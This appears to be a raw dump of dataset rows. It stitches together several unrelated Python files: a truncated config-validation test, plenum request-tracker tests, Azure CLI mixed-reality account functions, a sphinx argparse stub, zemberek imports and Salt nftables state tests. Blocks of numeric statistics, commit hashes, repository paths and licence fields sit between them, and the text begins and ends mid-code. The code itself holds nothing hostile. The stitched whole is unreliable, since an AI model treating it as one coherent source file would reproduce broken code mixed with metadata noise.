cond1 = {"s": 1, "z": 2, "x": 4}
cond2 = {"s": 1, "z": 2, "x": 4}
j14["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j14)
cond1 = {"column": None, "operator": "gt", "value": 4}
cond2 = {"column": 1, "operator": "gt", "value": 4}
j14["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j14)
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "vgt", "value": 4}
j14["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j14)
cond1 = {"column": "we", "operator": "gt", "value": "s"}
cond2 = {"column": "c1", "operator": "gt", "value": 4}
j14["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j14)
print("###########")
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "eq", "value": True}
j14["metrics"][0]["conditions"] = [cond1, cond2]
with self.assertRaises(AssertionError) as cm:
Config(j14)
cond1 = {"column": "we", "operator": "gt", "value": 4}
cond2 = {"column": "c1", "operator": "eq", "value": "jhon"}
j14["metrics"][0]["conditions"] = [cond1, cond2]
# should run
Config(j14)
def test_deduplication_aproximated_check(self):
j15 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "deduplication_approximated",
"columns": []
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j15)
j15["metrics"][0]["metric"] = 10
del j15["metrics"][0]["columns"]
with self.assertRaises(AssertionError) as cm:
Config(j15)
j15["metrics"][0]["metric"] = "deduplication_approximated"
j15["metrics"][0]["useless param"] = 1010
with self.assertRaises(AssertionError) as cm:
Config(j15)
j15["metrics"][0]["columns"] = ["c0"]
# note that at this point "useless param" is still in there
with self.assertRaises(AssertionError) as cm:
Config(j15)
del j15["metrics"][0]["useless param"]
# should run
Config(j15)
def test_entropy_check(self):
j16 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "entropy",
"column": []
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j16)
j16["metrics"][0]["metric"] = 10
j16["metrics"][0]["column"] = "c1"
with self.assertRaises(AssertionError) as cm:
Config(j16)
j16["metrics"][0]["metric"] = "entropy"
j16["metrics"][0]["useless param"] = 1010
with self.assertRaises(AssertionError) as cm:
Config(j16)
del j16["metrics"][0]["column"]
with self.assertRaises(AssertionError) as cm:
Config(j16)
del j16["metrics"][0]["useless param"]
with self.assertRaises(AssertionError) as cm:
Config(j16)
j16["metrics"][0]["column"] = "c1"
# should run
Config(j16)
def test_mutual_info_check(self):
j17 = {
"table": "tablePath",
"inferSchema": True,
"delimiter": "#",
"header": False,
"output": home + "/output.json",
"verbose": False,
"metrics": [
{
"metric": "mutual",
"when": "c1",
"then": 2
},
]
}
with self.assertRaises(AssertionError) as cm:
Config(j17)
j17["metrics"][0]["metric"] = "mutual_info"
j17["metrics"][0]["when"] = ["c1"]
with self.assertRaises(AssertionError) as cm:
Config(j17)
j17["metrics"][0]["when"] = 1
j17["metrics"][0]["then"] = [0]
with self.assertRaises(AssertionError) as cm:
Config(j17)
j17["metrics"][0]["then"] = 0
j17["metrics"][0]["useless param"] = 1010
with self.assertRaises(AssertionError) as cm:
Config(j17)
j17["metrics"][0]["then"] = 1
del j17["metrics"][0]["useless param"]
with self.assertRaises(AssertionError) as cm:
Config(j17)
del j17["metrics"][0]["then"]
with self.assertRaises(AssertionError) as cm:
Config(j17)
del j17["metrics"][0]["when"]
j17["metrics"][0]["then"] = 1
with self.assertRaises(AssertionError) as cm:
Config(j17)
j17["metrics"][0]["then"] = 1
with self.assertRaises(AssertionError) as cm:
Config(j17)
j17["metrics"][0]["when"] = 2
Config(j17)
| 31.312736
| 98
| 0.481656
| 2,349
| 24,831
| 5.076203
| 0.069817
| 0.097283
| 0.159343
| 0.265179
| 0.840993
| 0.82682
| 0.819859
| 0.799564
| 0.746394
| 0.722409
| 0
| 0.052999
| 0.348033
| 24,831
| 792
| 99
| 31.352273
| 0.683551
| 0.020499
| 0
| 0.633803
| 0
| 0
| 0.196692
| 0.002156
| 0
| 0
| 0
| 0
| 0.159624
| 1
| 0.023474
| false
| 0
| 0.004695
| 0
| 0.029734
| 0.001565
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
851b1edef39594e4f12485b19cec356d5be61023
| 7,793
|
py
|
Python
|
plenum/test/monitoring/test_request_time_tracker.py
|
andkononykhin/plenum
|
28dc1719f4b7e80d31dafbadb38cfec4da949886
|
[
"Apache-2.0"
] | 148
|
2017-07-11T19:05:25.000Z
|
2022-03-16T21:31:20.000Z
|
plenum/test/monitoring/test_request_time_tracker.py
|
andkononykhin/plenum
|
28dc1719f4b7e80d31dafbadb38cfec4da949886
|
[
"Apache-2.0"
] | 561
|
2017-06-29T17:59:56.000Z
|
2022-03-09T15:47:14.000Z
|
plenum/test/monitoring/test_request_time_tracker.py
|
andkononykhin/plenum
|
28dc1719f4b7e80d31dafbadb38cfec4da949886
|
[
"Apache-2.0"
] | 378
|
2017-06-29T17:45:27.000Z
|
2022-03-26T07:27:59.000Z
|
import pytest
from plenum.server.monitor import RequestTimeTracker
INSTANCE_COUNT = 4
@pytest.fixture(scope="function")
def req_tracker():
instances = set(range(INSTANCE_COUNT))
removed_replica = INSTANCE_COUNT // 2
instances.remove(removed_replica)
return RequestTimeTracker(instances)
def test_request_tracker_start_adds_request(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
assert digest in req_tracker
assert req_tracker.started(digest) == now
assert digest in req_tracker.unordered()
assert digest in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
def test_request_tracker_handle_makes_request_handled_unordered(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.handle(digest)
assert digest in req_tracker
assert digest in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest in req_tracker.handled_unordered()
def test_request_tracker_reset_clears_all_requests(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.handle(digest)
req_tracker.reset()
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
def test_request_tracker_order_by_master_makes_request_ordered_and_returns_time_to_order(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
tto = req_tracker.order(0, digest, now + 5)
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
assert int(tto) == 5
def test_request_tracker_order_by_master_makes_handled_request_ordered_and_returns_time_to_order(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.handle(digest)
tto = req_tracker.order(0, digest, now + 5)
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
assert int(tto) == 5
def test_request_tracker_order_by_backup_returns_time_to_order(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
tto = req_tracker.order(1, digest, now + 5)
assert digest in req_tracker.unordered()
assert digest in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
assert int(tto) == 5
def test_request_tracker_deletes_request_only_when_it_is_ordered_by_all_instances(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
for instId in range(INSTANCE_COUNT - 1):
req_tracker.order(instId, digest, now)
assert digest in req_tracker
req_tracker.order(INSTANCE_COUNT - 1, digest, now)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in req_tracker.handled_unordered()
def test_request_tracker_doesnt_wait_for_new_instances_on_old_requests(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.add_instance(INSTANCE_COUNT)
for instId in range(INSTANCE_COUNT):
req_tracker.order(instId, digest, now)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in req_tracker.handled_unordered()
def test_request_tracker_waits_for_new_instances_on_new_requests(req_tracker):
digest = "digest"
now = 1.0
req_tracker.add_instance(INSTANCE_COUNT)
req_tracker.start(digest, now)
for instId in range(INSTANCE_COUNT):
req_tracker.order(instId, digest, now)
assert digest in req_tracker
req_tracker.order(INSTANCE_COUNT, digest, now)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in req_tracker.handled_unordered()
def test_request_tracker_performs_garbage_collection_on_remove_instance(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.order(1, digest, now)
req_tracker.order(2, digest, now)
req_tracker.remove_instance(0)
assert digest in req_tracker
req_tracker.remove_instance(3)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in req_tracker.handled_unordered()
def test_force_req_drop_not_started(req_tracker):
digest = "digest"
req_tracker.force_req_drop(digest)
def test_force_req_drop_started(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
assert digest in req_tracker
assert digest in req_tracker.unordered()
assert digest in [digest for digest, _ in req_tracker.unhandled_unordered()]
req_tracker.force_req_drop(digest)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
def test_force_req_drop_handled(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.handle(digest)
assert digest in req_tracker
assert digest in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest in req_tracker.handled_unordered()
req_tracker.force_req_drop(digest)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
def test_force_req_drop_between_ordered_master(req_tracker):
digest = "digest"
start_ts = 1.0
now = 3.0
req_tracker.start(digest, start_ts)
tto = req_tracker.order(0, digest, now)
assert tto == 2.0
assert digest not in req_tracker.unordered()
req_tracker.force_req_drop(digest)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
tto = req_tracker.order(1, digest, now)
assert tto == 0.0
def test_force_req_drop_between_ordered_backup(req_tracker):
digest = "digest"
start_ts = 1.0
now = 3.0
req_tracker.start(digest, start_ts)
tto = req_tracker.order(1, digest, now)
assert tto == 2.0
assert digest in req_tracker.unordered()
req_tracker.force_req_drop(digest)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
tto = req_tracker.order(2, digest, now)
assert tto == 0.0
def test_force_req_drop_before_handle(req_tracker):
digest = "digest"
now = 1.0
req_tracker.start(digest, now)
req_tracker.force_req_drop(digest)
assert digest not in req_tracker
assert digest not in req_tracker.unordered()
assert digest not in [digest for digest, _ in req_tracker.unhandled_unordered()]
assert digest not in req_tracker.handled_unordered()
req_tracker.handle(digest)
assert digest not in req_tracker.handled_unordered()
| 29.518939
| 110
| 0.744386
| 1,124
| 7,793
| 4.870107
| 0.071174
| 0.235659
| 0.144684
| 0.149068
| 0.894045
| 0.883814
| 0.861162
| 0.842711
| 0.821155
| 0.813665
| 0
| 0.009889
| 0.182471
| 7,793
| 263
| 111
| 29.631179
| 0.849317
| 0
| 0
| 0.794444
| 0
| 0
| 0.013345
| 0
| 0
| 0
| 0
| 0
| 0.411111
| 1
| 0.094444
| false
| 0
| 0.011111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5180a038514f79ae0aee1e02a5975b292b15d7d0
| 7,787
|
py
|
Python
|
src/mixed-reality/azext_mixed_reality/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/mixed-reality/azext_mixed_reality/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/mixed-reality/azext_mixed_reality/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import json
from ._client_factory import cf_spatial_anchor_account, cf_remote_rendering_account
def spatial_anchor_account_list(cmd,
resource_group_name=None):
client = cf_spatial_anchor_account(cmd.cli_ctx)
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list_by_subscription()
def spatial_anchor_account_show(cmd,
resource_group_name,
account_name):
client = cf_spatial_anchor_account(cmd.cli_ctx)
return client.get(resource_group_name=resource_group_name,
account_name=account_name)
def spatial_anchor_account_create(cmd,
resource_group_name,
account_name,
location=None,
tags=None,
sku=None,
kind=None,
storage_account_name=None):
spatial_anchors_account = {}
spatial_anchors_account['tags'] = tags
spatial_anchors_account['location'] = location
spatial_anchors_account['sku'] = sku
spatial_anchors_account['kind'] = kind
spatial_anchors_account['storage_account_name'] = storage_account_name
client = cf_spatial_anchor_account(cmd.cli_ctx)
return client.create(resource_group_name=resource_group_name,
account_name=account_name,
spatial_anchors_account=spatial_anchors_account)
def spatial_anchor_account_update(cmd,
instance,
location=None,
tags=None,
sku=None,
kind=None,
storage_account_name=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('location', location)
c.set_param('sku', sku)
c.set_param('kind', kind)
c.set_param('storage_account_name', storage_account_name)
return instance
def spatial_anchor_account_delete(cmd,
resource_group_name,
account_name):
client = cf_spatial_anchor_account(cmd.cli_ctx)
return client.delete(resource_group_name=resource_group_name,
account_name=account_name)
def spatial_anchor_account_list_key(cmd,
resource_group_name,
account_name):
client = cf_spatial_anchor_account(cmd.cli_ctx)
return client.list_keys(resource_group_name=resource_group_name,
account_name=account_name)
def spatial_anchor_account_regenerate_key(cmd,
resource_group_name,
account_name,
key=None):
regenerate = {}
regenerate['serial'] = ['primary', 'secondary'].index(key) + 1
client = cf_spatial_anchor_account(cmd.cli_ctx)
return client.regenerate_keys(resource_group_name=resource_group_name,
account_name=account_name,
regenerate=regenerate)
def remote_rendering_account_list(cmd,
resource_group_name=None):
client = cf_remote_rendering_account(cmd.cli_ctx)
if resource_group_name:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list_by_subscription()
def remote_rendering_account_show(cmd,
resource_group_name,
account_name):
client = cf_remote_rendering_account(cmd.cli_ctx)
return client.get(resource_group_name=resource_group_name,
account_name=account_name)
def remote_rendering_account_create(cmd,
resource_group_name,
account_name,
location=None,
tags=None,
sku=None,
kind=None,
storage_account_name=None):
remote_rendering_account = {}
remote_rendering_account['tags'] = tags
remote_rendering_account['location'] = location
remote_rendering_account['identity'] = json.loads("{\"type\": \"SystemAssigned\"}")
remote_rendering_account['sku'] = sku
remote_rendering_account['kind'] = kind
remote_rendering_account['storage_account_name'] = storage_account_name
client = cf_remote_rendering_account(cmd.cli_ctx)
return client.create(resource_group_name=resource_group_name,
account_name=account_name,
remote_rendering_account=remote_rendering_account)
def remote_rendering_account_update(cmd,
resource_group_name,
account_name,
location=None,
tags=None,
sku=None,
kind=None,
storage_account_name=None):
remote_rendering_account = {}
remote_rendering_account['tags'] = tags
remote_rendering_account['location'] = location
remote_rendering_account['identity'] = json.loads("{\"type\": \"SystemAssigned\"}")
remote_rendering_account['sku'] = sku
remote_rendering_account['kind'] = kind
remote_rendering_account['storage_account_name'] = storage_account_name
client = cf_remote_rendering_account(cmd.cli_ctx)
return client.update(resource_group_name=resource_group_name,
account_name=account_name,
remote_rendering_account=remote_rendering_account)
def remote_rendering_account_delete(cmd,
resource_group_name,
account_name):
client = cf_remote_rendering_account(cmd.cli_ctx)
return client.delete(resource_group_name=resource_group_name,
account_name=account_name)
def remote_rendering_account_list_key(cmd,
resource_group_name,
account_name):
client = cf_remote_rendering_account(cmd.cli_ctx)
return client.list_keys(resource_group_name=resource_group_name,
account_name=account_name)
def remote_rendering_account_regenerate_key(cmd,
resource_group_name,
account_name,
key=None):
regenerate = {}
regenerate['serial'] = ['primary', 'secondary'].index(key) + 1
client = cf_remote_rendering_account(cmd.cli_ctx)
return client.regenerate_keys(resource_group_name=resource_group_name,
account_name=account_name,
regenerate=regenerate)
| 43.747191
| 87
| 0.566971
| 743
| 7,787
| 5.515478
| 0.118439
| 0.120791
| 0.170083
| 0.128843
| 0.847731
| 0.832113
| 0.802831
| 0.802831
| 0.795998
| 0.767204
| 0
| 0.000397
| 0.352767
| 7,787
| 177
| 88
| 43.99435
| 0.812698
| 0.056376
| 0
| 0.771429
| 0
| 0
| 0.031071
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.014286
| 0
| 0.228571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
51a0b159aa4ea7d0ec08b9b94dd8081d123073bc
| 144
|
py
|
Python
|
roots/test-basic/parser.py
|
jugmac00/sphinx-argparse-cli
|
2e0b6bbffa78bdf4d4bb7bfc4b250e66a182f1eb
|
[
"MIT"
] | 10
|
2021-02-05T04:04:42.000Z
|
2021-05-20T18:41:30.000Z
|
roots/test-basic/parser.py
|
jugmac00/sphinx-argparse-cli
|
2e0b6bbffa78bdf4d4bb7bfc4b250e66a182f1eb
|
[
"MIT"
] | 10
|
2021-02-05T12:06:27.000Z
|
2021-08-07T09:29:53.000Z
|
roots/test-basic/parser.py
|
jugmac00/sphinx-argparse-cli
|
2e0b6bbffa78bdf4d4bb7bfc4b250e66a182f1eb
|
[
"MIT"
] | 4
|
2021-10-12T23:31:53.000Z
|
2022-02-16T11:56:44.000Z
|
from __future__ import annotations
from argparse import ArgumentParser
def make() -> ArgumentParser:
return ArgumentParser(prog="basic")
| 18
| 39
| 0.784722
| 15
| 144
| 7.266667
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 144
| 7
| 40
| 20.571429
| 0.886179
| 0
| 0
| 0
| 0
| 0
| 0.034722
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
51b63b3ce6aef9f1475da51d15b08e3cbfba7028
| 260
|
py
|
Python
|
nlp/zemberek/__init__.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | 1
|
2021-04-15T16:16:10.000Z
|
2021-04-15T16:16:10.000Z
|
nlp/zemberek/__init__.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | 1
|
2021-11-04T18:48:01.000Z
|
2021-11-04T18:48:01.000Z
|
nlp/zemberek/__init__.py
|
fatihint/lugatrap
|
868bd34517eb325591eba96af8176bc4ad5b0fb6
|
[
"Apache-2.0"
] | null | null | null |
from . import language_id_pb2
from . import language_id_pb2_grpc
from . import morphology_pb2
from . import morphology_pb2_grpc
from . import normalization_pb2
from . import normalization_pb2_grpc
from . import preprocess_pb2
from . import preprocess_pb2_grpc
| 28.888889
| 36
| 0.846154
| 38
| 260
| 5.421053
| 0.236842
| 0.38835
| 0.252427
| 0.247573
| 0.223301
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0.123077
| 260
| 8
| 37
| 32.5
| 0.868421
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cf9d4edac660ccc42c1879b40c54743206644e89
| 24,313
|
py
|
Python
|
tests/unit/states/test_nftables.py
|
Noah-Huppert/salt
|
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
|
[
"Apache-2.0"
] | 19
|
2016-01-29T14:37:52.000Z
|
2022-03-30T18:08:01.000Z
|
tests/unit/states/test_nftables.py
|
Noah-Huppert/salt
|
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
|
[
"Apache-2.0"
] | 223
|
2016-03-02T16:39:41.000Z
|
2022-03-03T12:26:35.000Z
|
tests/unit/states/test_nftables.py
|
Noah-Huppert/salt
|
998c382f5f2c3b4cbf7d96aa6913ada6993909b3
|
[
"Apache-2.0"
] | 64
|
2016-02-04T19:45:26.000Z
|
2021-12-15T02:02:31.000Z
|
"""
:codeauthor: Rahul Handay <rahulha@saltstack.com>
"""
# Import Python Libs
# Import Salt Libs
import salt.states.nftables as nftables
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase
class NftablesTestCase(TestCase, LoaderModuleMockMixin):
"""
Validate the nftables state
"""
def setup_loader_modules(self):
return {nftables: {}}
def test_chain_present(self):
"""
Test to verify the chain is exist.
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.check_chain": mock}):
ret.update(
{
"comment": "nftables salt chain is already"
" exist in filter table for ipv4"
}
)
self.assertDictEqual(nftables.chain_present("salt"), ret)
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.new_chain": mock}):
with patch.dict(nftables.__opts__, {"test": False}):
ret.update(
{
"changes": {"locale": "salt"},
"comment": "nftables salt chain in filter"
" table create success for ipv4",
}
)
self.assertDictEqual(nftables.chain_present("salt"), ret)
ret.update(
{
"changes": {},
"comment": "Failed to create salt chain"
" in filter table: for ipv4",
"result": False,
}
)
self.assertDictEqual(nftables.chain_present("salt"), ret)
def test_chain_absent(self):
"""
Test to verify the chain is absent.
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(side_effect=[False, True])
with patch.dict(nftables.__salt__, {"nftables.check_chain": mock}):
ret.update(
{
"comment": "nftables salt chain is already absent"
" in filter table for ipv4"
}
)
self.assertDictEqual(nftables.chain_absent("salt"), ret)
mock = MagicMock(return_value="")
with patch.dict(nftables.__salt__, {"nftables.flush": mock}):
ret.update(
{
"result": False,
"comment": "Failed to flush salt chain"
" in filter table: for ipv4",
}
)
self.assertDictEqual(nftables.chain_absent("salt"), ret)
def test_append(self):
"""
Test to append a rule to a chain
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(return_value=[])
with patch.object(nftables, "_STATE_INTERNAL_KEYWORDS", mock):
mock = MagicMock(return_value={"result": True, "comment": "", "rule": "a"})
with patch.dict(nftables.__salt__, {"nftables.build_rule": mock}):
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
{"result": False, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.check": mock}):
ret.update(
{
"comment": "nftables rule for salt"
" already set (a) for ipv4"
}
)
self.assertDictEqual(
nftables.append("salt", table="", chain=""), ret
)
with patch.dict(nftables.__opts__, {"test": True}):
ret.update(
{
"result": None,
"comment": "nftables rule for salt needs"
" to be set (a) for ipv4",
}
)
self.assertDictEqual(
nftables.append("salt", table="", chain=""), ret
)
with patch.dict(nftables.__opts__, {"test": False}):
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.append": mock}):
ret.update(
{
"changes": {"locale": "salt"},
"comment": "Set nftables rule for salt"
" to: a for ipv4",
"result": True,
}
)
self.assertDictEqual(
nftables.append("salt", table="", chain=""), ret
)
ret.update(
{
"changes": {},
"comment": "Failed to set nftables"
" rule for salt.\nAttempted rule was"
" a for ipv4.\n",
"result": False,
}
)
self.assertDictEqual(
nftables.append("salt", table="", chain=""), ret
)
def test_insert(self):
"""
Test to insert a rule into a chain
"""
ret = {"name": "salt", "changes": {}, "result": True, "comment": ""}
mock = MagicMock(return_value=[])
with patch.object(nftables, "_STATE_INTERNAL_KEYWORDS", mock):
mock = MagicMock(return_value={"result": True, "comment": "", "rule": "a"})
with patch.dict(nftables.__salt__, {"nftables.build_rule": mock}):
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
{"result": False, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.check": mock}):
ret.update(
{
"comment": "nftables rule for salt already"
" set for ipv4 (a)"
}
)
self.assertDictEqual(
nftables.insert("salt", table="", chain=""), ret
)
with patch.dict(nftables.__opts__, {"test": True}):
ret.update(
{
"result": None,
"comment": "nftables rule for salt"
" needs to be set for ipv4 (a)",
}
)
self.assertDictEqual(
nftables.insert("salt", table="", chain=""), ret
)
with patch.dict(nftables.__opts__, {"test": False}):
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.insert": mock}):
ret.update(
{
"changes": {"locale": "salt"},
"comment": "Set nftables rule for"
" salt to: a for ipv4",
"result": True,
}
)
self.assertDictEqual(
nftables.insert(
"salt", table="", chain="", position=""
),
ret,
)
ret.update(
{
"changes": {},
"comment": "Failed to set nftables"
" rule for salt.\nAttempted rule was"
" a",
"result": False,
}
)
self.assertDictEqual(
nftables.insert(
"salt", table="", chain="", position=""
),
ret,
)
def test_delete(self):
"""
Test to delete a rule to a chain
"""
ret = {"name": "salt", "changes": {}, "result": None, "comment": ""}
mock = MagicMock(return_value=[])
with patch.object(nftables, "_STATE_INTERNAL_KEYWORDS", mock):
mock = MagicMock(return_value={"result": True, "comment": "", "rule": "a"})
with patch.dict(nftables.__salt__, {"nftables.build_rule": mock}):
mock = MagicMock(
side_effect=[
{"result": False, "comment": ""},
{"result": True, "comment": ""},
{"result": True, "comment": ""},
{"result": True, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.check": mock}):
ret.update(
{
"comment": "nftables rule for salt"
" already absent for ipv4 (a)",
"result": True,
}
)
self.assertDictEqual(
nftables.delete("salt", table="", chain=""), ret
)
with patch.dict(nftables.__opts__, {"test": True}):
ret.update(
{
"result": None,
"comment": "nftables rule for salt needs"
" to be deleted for ipv4 (a)",
}
)
self.assertDictEqual(
nftables.delete("salt", table="", chain=""), ret
)
with patch.dict(nftables.__opts__, {"test": False}):
mock = MagicMock(
side_effect=[
{"result": True, "comment": ""},
{"result": False, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.delete": mock}):
ret.update(
{
"result": True,
"changes": {"locale": "salt"},
"comment": "Delete nftables rule" " for salt a",
}
)
self.assertDictEqual(
nftables.delete(
"salt", table="", chain="", position=""
),
ret,
)
ret.update(
{
"result": False,
"changes": {},
"comment": "Failed to delete nftables"
" rule for salt.\nAttempted rule was a",
}
)
self.assertDictEqual(
nftables.delete(
"salt", table="", chain="", position=""
),
ret,
)
def test_flush(self):
"""
Test to flush current nftables state
"""
ret = {"name": "salt", "changes": {}, "result": None, "comment": ""}
mock = MagicMock(return_value=[])
with patch.object(nftables, "_STATE_INTERNAL_KEYWORDS", mock):
mock = MagicMock(
side_effect=[
{"result": False, "comment": ""},
{"result": True, "comment": ""},
{"result": True, "comment": ""},
{"result": True, "comment": ""},
]
)
with patch.dict(nftables.__salt__, {"nftables.check_table": mock}):
with patch.dict(nftables.__opts__, {"test": False}):
ret.update(
{
"comment": "Failed to flush table in family"
" ipv4, table does not exist.",
"result": False,
}
)
self.assertDictEqual(
nftables.flush(
